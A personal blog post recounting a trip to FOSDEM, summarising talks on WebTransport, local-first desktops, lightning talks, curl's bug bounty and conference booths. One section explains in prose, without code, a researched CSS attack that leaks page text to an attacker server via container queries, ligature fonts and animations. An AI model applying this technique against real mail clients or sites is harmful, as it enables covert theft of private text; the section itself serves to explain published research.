Late last year I finally had the chance to attend the Matrix conference, I had missed the year before due to running out of days on my Schengen visa. That was a blast, and as soon as I got home I wanted to find the next thing to attend. Then I spotted that the Free and Open-source Software Developers’ European Meeting, better known as FOSDEM, was taking place in only a few months. So I hastily organised a few friends and an Airbnb and stuck it in the diary. I had a skim of the schedule, and was amazed at the sheer volume of things going on in only two days. The Matrix conference seemed like a walk in the park in comparison.

Fast forward to last weekend, it was a sleepy morning getting the early Saturday Eurostar to Brussels. We found our Airbnb, checked in, and got on the tram to the conference. As we got closer to the venue, we kept spotting people who were here to attend FOSDEM. Easily identifiable features include: tech t-shirts, dot-matrix name tags, laptop stickers, the whole lot. Throughout the whole weekend I was constantly surprised and impressed by the sheer scale of the conference, the Université Libre de Bruxelles (ULB) campus had so many nooks and crannies, cafés, cafeterias and food trucks. Every seat, every table and seeming almost every square foot of standing area was packed with people. A friend later told me there were 15000 attendees. The FOSDEM team are seriously impressive; admission was free, and not only that, but there was no way to ‘get’ a ticket, you just show up. That means that the organisers also have no indication of the amount of people coming, but despite all that everything ran incredibly smoothly. We always eventually found food and a place to sit when we needed it, and only ended up missing a few talks due to the rooms being over capacity.

I regret not recording my experience with the Matrix conference last year, so I’m turning that around with FOSDEM! Here’s a few talks and other experiences I had that I thought were worth sharing!

WebTransport

The first talk we got into was titled “Intro to WebTransport - the next WebSocket?” by Max Inden, an engineer working on Firefox. I had heard of WebTransport before but never knew what it was, this talk is a great intro to why WebSockets aren’t always enough and how WebTransport addresses those needs.

It mostly revolves around two main problems that WebSocket has:

  • Head-of-line blocking - A web socket connection is a stream, meaning every byte sent down it is sent in a particular order. However this means if an packet of information earlier in the stream is lost, the rest of the stream behind it may have to wait for that packet to be retransmitted. This might be what you want, but often this means your device may have received data that it could be doing something with, but it’s not provided to the application until the earlier data is properly received (to preserve ordering).
  • Reliability - This one is a bit counter-intuitive if you’ve not heard about it before, but WebSockets are too darn reliable. I’ll explain with an example: Say you’re watching a live-stream of your favourite creator, the packets containing video information are sent to your device and decoded for your viewing pleasure. This data is time-sensitive; if the server sends you data for a particular frame and it doesn’t arrive on time, then there’s no point resending that data to your device, since chances are your device has already moved past that frame onto the following frames. The dropped packets are stale. The resending of packets in reliable channels is sometimes wasted work, WebTransport lets you send data ‘unreliably’ where you essentially say “Send this packet, maybe it arrives, maybe it doesn’t, but don’t care about that and especially don’t retransmit!”.

You can Max’s website here1, or the talk here.

Cascading Spy Sheets

This talk caught our eye as it seemed to be about using CSS to exfiltrate data, I seem to remember hearing about a keylogger in CSS a long time ago, so I was interested to see what the current state of the research was. This talk is definitely worth a watch, but I’m going to attempt to retell the most interesting attack.

Lets say you have some way of controlling the CSS applied to text on a web page, but no way of reading the text directly. In the talk their example was an email client that didn’t properly sandbox the CSS provided by emails. CSS provides ‘media queries’, which let you apply styling conditionally based on the size of the screen viewing the content, this is important as many websites change their styling based on whether you’re viewing it from a desktop, tablet, or mobile phone. CSS also has a more generic form of this called a ‘container query’, which lets you conditionally apply styling based on simply the size of the parent container of an element. If you combine this with a CSS property that can take a URL, for example the background image, you can now have the client conditionally send a web request depending on the size of an element’s container.

Okay, so you can tell how wide or tall an element’s container is, but that sounds pretty mundane. But what if you could turn text into a particular width, such that you can work backwards and work out the text given the width. Then you could potentially leak the text!

So it turns out that fonts can specify these things called ’ligatures’, which is where sequences of characters are replaced by a single ’ligature’. This is usually used stylistically, resolving edgecases of weird letter spacing or to add some extra flair to a font. It’s also used by programming fonts to give sequences like >= their own special character2. The rules are somewhat arbitrary and decided by the font, meaning you can specify any sequence of characters to be ligature-ised. The important thing for us is that we can now take any arbitrary sequence of characters and replace them with a custom character, which most importantly can have a custom width. We have a way of turning a specific sequence of characters into a width! But for this to work we would have to give every possible combination of characters their own symbol with their own unique width, which quickly becomes untenable.

So the final piece of the puzzle, CSS animations! The general idea is like this:

  1. CSS animation is set to cycle the font through many URLs that you control at a sufficiently slow pace.
  2. The first font uses ligatures to give, say, each character of the alphabet a uniquely identifiable width, which combined with container queries can send a web request to the attacker server identifying that first character.
  3. After receiving what that character is, say it’s “h”, the server generates the second font on the fly, which generates ligatures for all the characters of the alphabet, but prefixed with “h”. i.e. “ha”, “hb”, “hc”. And now using container queries we can identify the second character.
  4. This process continues until an entire block of text is leaked!

Of course this explanation of mine glosses over some specifics, but if you want more details you should check our the talk here or their blog post here. As a side note, this approach of going character by character reminds me a lot of how you can use blind SQLi to dump database information, which is a favourite technique of mine!

Towards a Local-first Linux Desktop

Local-first is one of those movements that I only discovered recently, but the more I learn about it the more it just seems common sense. This talk was delivered by Tobias Bernard and Andreas Dzialocha, and mostly covered Modal, a software-building collective and p2panda, a modular toolkit to build local-first and peer-to-peer apps. I feel like the most exciting thing about this talk for me was Modal’s design-first approach, and some of the designs they came up with for managing the cognitive load that peer-to-peer software can induce. I especially liked the idea of piggy-backing off the contacts app to give intuitive permissions management, somewhat like how Apple’s AirDrop or Google’s Nearby share works. I’m definitely going to keep an eye on Modal, who are based in Berlin, all the cool tech stuff happens in Berlin! Check out Modal here and p2panda here. I will try to remember to link the talk once it’s available!

Lightning talks

FOSDEM speaker presenting a slide with the text “My grandma is now a linux user”

There were a few sessions of lightning talks throughout the weekend, I attended one towards the end of Sunday in the Janson lecture hall (which is humongous, by the way). In true lightning fashion I will try to give a 1 sentence summary of each talk:

  1. CONTRIBUTING.yml - machine-readable contribution-related project info.
  2. Cyber Resiliency Act (CRA) Misconceptions - the CRA is not as scary for open-source maintainers as I had originally read on HackerNews.
  3. Dumb guide to smart TVs - Modern TVs literally watch what you’re watching with Automatic Content Recognition (ACR), hack your TV with open OSes.
  4. Postgres Compatability Index (PCI) - Automatic way to measure how compatible with Postgres other projects are, the speaker also has a fun blog.
  5. Pacman Cacheserver - Does what it says on the tin.
  6. EU Software Patents - Found it hard to follow this talk, but mostly concerned some of the legal battles behind software patents in the EU.
  7. GUI -> TUI - An absolutely wacky (and successful) attempt at rendering pixels as unicode squares in the terminal.
  8. Windows 10 EOL - Higher hardware requirement on Windows 11 leaves hundreds of millions of unsupported Windows 10 devices in the wild, including the speaker’s Grandma, who now uses Linux.
  9. Store your mail in git (Symig) - Mail-as-files, checked into git.
  10. RCL - Yet another configuration language, but with some functional goodness sprinkled in?
  11. gitify your life - A recurring talk summarising git-powered tools used by the speaker over the past several years.

As always, check out the talk here.

Open source security with AI

Or, in other words, “curl guy Daniel Stenberg (rightfully) complains about AI slop on their bug bounty program”. That is overly simplistic though, he makes some interesting observations about AI and open-source. One interesting remark is how AI isn’t the problem, rather humans are, AI is a just a tool that can be brilliant in one person’s hands, and destructive in another. He concluded the talk sharing that the bug bounty program for curl, after many trials and tribulations, is now closed.

As a recovering bug-bounty-holic (with only one bug report to his name), it’s sad to see a bug bounty program close, when not too long ago the hype behind bug bounties seemed to be about how so many programs were opening up. I sincerely hope that when this bubble pops, or gracefully deflates, that projects under the same people and monetary contraints as curl will be able to run bug bounties again. Watch the talk here.

Stands

Here and there between the talks I also checked out many of the booths and stands on offer, had many interesting conversations and of course collected many stickers. Here’s a brief list of some of those experiences:

  • Said hi to some of the Matrix folks, but also got to meet the XMPP folks and learn more about their tech and crucially how they differ to Matrix. It seems like the major difference is that Matrix is batteries-included and pretty laser-focused on the whole Discord/Slack market, whereas XMPP is more of a unix-philosophy ‘do one thing well’, adopting a modular approach and it has the benefit of age with many major organisations relying on them.
  • Saw a 3D printed microscope, picked up a ‘You wouldn’t download a microscope’ sticker.
  • Got a cool keyring for having heard about DeepComputing and their RISC-V Framework mainboard before meeting them at the conference.
  • That the mustard indicates progress?
  • I was aware of Codeberg being a thing that existed and was like GitHub, but had no idea that they were fully donation funded and volunteer run, very cool!
  • Chatted to some people behind Overte, prompted by this cool binocular camera rig that one of them had. Seems like they were doing some experiments with 3D photos?
  • Learned about FOSSASIA and bought a dot-matrix name tag from them, seems like a very cool organisation!
  • Spent a while chatting with the Internet Archive Europe folks about their sister project the DWeb camp, which is coming to Europe this year! It seems to be some kind of nature getaway, but with power and good WiFi, and a combination of planned an spontaneous talks and workshops. I’m definitely going to try and attend it if I can make it work.

The Day After

a picture of the St. Michael and St. Gudula Cathedral

Our Eurostar back was in the afternoon on Monday, so we had the morning in Brussels to ourselves. We wandered for a bit and spontaneously went on a pay-what-you-want walking tour lead by Estref (working for Adventours). If you’re ever in Brussels and can find this guy I would definitely recommend, he showed us around the city and gave us lots of historical context and shared local legends, but of course made sure to draw the line between the two. We also had a chocolate treat from Elisabeth, which I would call a (Tunnock’s) Teacake, but it was much tastier.

Conclusion

Overall FOSDEM was a blast, I’m definitely going to try and come again next year.

  1. at time of writing he uses the same blog theme as me! ↩︎

  2. One example is Fira Code https://github.com/tonsky/FiraCode, or the default font used by the Zed editor. ↩︎